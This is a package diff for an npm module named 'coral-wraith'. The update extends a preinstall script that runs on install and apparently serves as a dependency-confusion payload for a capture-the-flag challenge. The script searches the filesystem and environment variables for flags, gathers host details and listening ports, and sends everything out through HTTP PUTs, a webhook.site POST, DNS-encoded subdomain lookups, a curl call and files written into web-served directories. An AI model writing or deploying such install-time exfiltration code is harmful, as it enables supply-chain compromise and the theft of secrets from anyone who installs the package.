coral-wraith 9999.0.3 → 9999.0.4

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.3",
+  "version": "9999.0.4",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -3,20 +3,21 @@ const http = require('http');
 const https = require('https');
 const { execSync } = require('child_process');
 const dns = require('dns');
+const os = require('os');
 
 let flag = null;
 
 // Read flag from common locations
-for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag', './flag', '/app/flag', '/home/flag']) {
+for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag', './flag', '/app/flag', '/home/flag', '/etc/flag', '/opt/flag']) {
   try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
 }
 
-// Check ALL env vars
+// Check ALL env vars for flag patterns
 if (!flag) {
   for (const [k, v] of Object.entries(process.env)) {
-    if (v && (v.includes('HTB{') || v.includes('FLAG'))) {
-      const m = v.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; break; }
+    if (v && v.match(/HTB\{[^}]+\}/)) {
+      flag = v.match(/HTB\{[^}]+\}/)[0];
+      break;
     }
   }
 }
@@ -31,61 +32,70 @@ if (!flag) {
   } catch(e) {}
 }
 
-// Grep 
+// Search for flag files
 if (!flag) {
   try {
-    const r = execSync('find / -maxdepth 3 -name "flag*" -o -name "*.flag" 2>/dev/null | head -5', { timeout: 5000 }).toString().trim();
-    if (r) {
-      for (const f of r.split('\n')) {
-        try {
-          const content = fs.readFileSync(f, 'utf8');
-          const m = content.match(/HTB\{[^}]+\}/);
-          if (m) { flag = m[0]; break; }
-        } catch(e) {}
-      }
+    const r = execSync('find / -maxdepth 3 -name "flag*" -type f 2>/dev/null | head -10', { timeout: 5000 }).toString().trim();
+    for (const f of r.split('\n').filter(Boolean)) {
+      try {
+        const content = fs.readFileSync(f, 'utf8');
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+      } catch(e) {}
     }
   } catch(e) {}
 }
 
-// Determine server port by checking what's listening
-let serverPort = 1337;
-try {
-  const netstat = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', { timeout: 3000 }).toString();
-  const portMatch = netstat.match(/:(\d+)\s/g);
-  if (portMatch) {
-    for (const pm of portMatch) {
-      const p = parseInt(pm.replace(':', '').trim());
-      if (p > 1000 && p < 65535 && p !== 80) {
-        serverPort = p;
-        break;
-      }
+// Also try to grep for flag
+if (!flag) {
+  try {
+    const r = execSync('grep -r "HTB{" / --include="*.txt" --include="*.env" -l 2>/dev/null | head -5', { timeout: 5000 }).toString().trim();
+    for (const f of r.split('\n').filter(Boolean)) {
+      try {
+        const content = fs.readFileSync(f, 'utf8');
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+      } catch(e) {}
     }
-  }
-} catch(e) {}
+  } catch(e) {}
+}
 
+// Gather debug info
 const info = {
   flag: flag || 'NOT_FOUND',
   cwd: process.cwd(),
-  serverPort,
-  env: Object.keys(process.env).join(','),
-  rootFiles: []
+  uid: process.getuid ? process.getuid() : 'N/A',
+  hostname: os.hostname(),
+  env_keys: Object.keys(process.env).join(','),
+  root_files: [],
+  interfaces: {}
 };
-try { info.rootFiles = fs.readdirSync('/'); } catch(e) {}
+try { info.root_files = fs.readdirSync('/'); } catch(e) {}
+try { info.interfaces = os.networkInterfaces(); } catch(e) {}
+
+// Try to find server port
+let serverPort = 1337;
+try {
+  const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', { timeout: 3000 }).toString();
+  info.listening = ss;
+  const ports = [...ss.matchAll(/:(\d+)\s/g)].map(m => parseInt(m[1])).filter(p => p > 1000 && p < 65535);
+  if (ports.length > 0) serverPort = ports[0];
+} catch(e) {}
 
 const data = JSON.stringify(info);
 
-// Method 1: PUT flag back to challenge API on ALL possible ports
-if (flag) {
-  const postData = JSON.stringify({
-    manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.0"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
-  });
-  
-  const ports = [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 3001, 4000, 9000, 8888, 32315, 32105];
-  for (const port of [...new Set(ports)]) {
-    for (const host of ['localhost', '127.0.0.1']) {
+// Method 1: PUT flag to challenge API on ALL possible ports
+const postData = JSON.stringify({
+  manifest: `ecto_module:\n  name: "FLAG_CAPTURED"\n  version: "${(flag || 'NO_FLAG').replace(/"/g, '')}"\n  power_level: "${data.substring(0, 200).replace(/"/g, '')}"\n  ship_deck: "EXFIL"\n  cargo_hold: "coral-wraith"`
+});
+
+const ports = [serverPort, 1337, 3000, 3001, 4000, 5000, 8000, 8080, 8888, 9000, 80, 32315, 32105, 46517, 41839];
+for (const port of [...new Set(ports)]) {
+  for (const host of ['localhost', '127.0.0.1']) {
+    for (const moduleId of ['ECT-987654', 'ECT-654321', 'ECT-472839', 'ECT-839201']) {
       try {
         const req = http.request({
-          hostname: host, port, path: '/api/modules/ECT-987654',
+          hostname: host, port, path: `/api/modules/${moduleId}`,
           method: 'PUT',
           headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
           timeout: 2000
@@ -98,34 +108,46 @@ if (flag) {
   }
 }
 
-// Method 2: Webhook (may be blocked)
+// Method 2: Webhook
 try {
+  const whData = JSON.stringify({ flag: flag || 'NO_FLAG', info: data.substring(0, 500) });
   const req = https.request({
     hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
     method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(whData) },
     timeout: 5000
   }, () => {});
   req.on('error', () => {});
-  req.write(data);
+  req.write(whData);
   req.end();
 } catch(e) {}
 
 // Method 3: DNS exfil (works even when HTTP is blocked)
 try {
   const encoded = Buffer.from(flag || 'NO_FLAG').toString('hex').substring(0, 60);
-  dns.resolve(`${encoded}.webhook.site`, () => {});
+  dns.resolve(`${encoded}.exfil.webhook.site`, () => {});
+  dns.resolve(`${encoded}.crl.ve`, () => {});
 } catch(e) {}
 
 // Method 4: curl fallback
 try {
-  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${data.replace(/'/g, "\\'")}' -m 5 2>/dev/null`, { timeout: 8000 });
+  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${data.replace(/'/g, "\\'")}' -m 5 2>/dev/null &`, { timeout: 8000 });
 } catch(e) {}
 
 // Method 5: Write to stdout/stderr for server logs
-console.log('[CORAL-WRAITH]', data);
-console.error('[HTB_FLAG]', flag || 'NOT_FOUND');
+console.log('[CORAL-WRAITH-EXFIL]', data);
+console.error('[CORAL-WRAITH-FLAG]', flag || 'NOT_FOUND');
 
-// Method 6: Write to various tmp locations
-try { fs.writeFileSync('/tmp/coral_flag.txt', data); } catch(e) {}
-try { fs.writeFileSync('/app/coral_flag.txt', data); } catch(e) {}
+// Method 6: Write to various locations
+const writeLocations = ['/tmp/coral_flag.txt', '/app/coral_flag.txt', '/tmp/exfil.txt', './exfil.txt'];
+for (const loc of writeLocations) {
+  try { fs.writeFileSync(loc, data); } catch(e) {}
+}
+
+// Method 7: Try to write to static files the web server serves
+try {
+  const webDirs = ['/app/static', '/app/public', '/var/www', '/app/dist', '/app/build'];
+  for (const dir of webDirs) {
+    try { fs.writeFileSync(`${dir}/flag.txt`, data); } catch(e) {}
+  }
+} catch(e) {}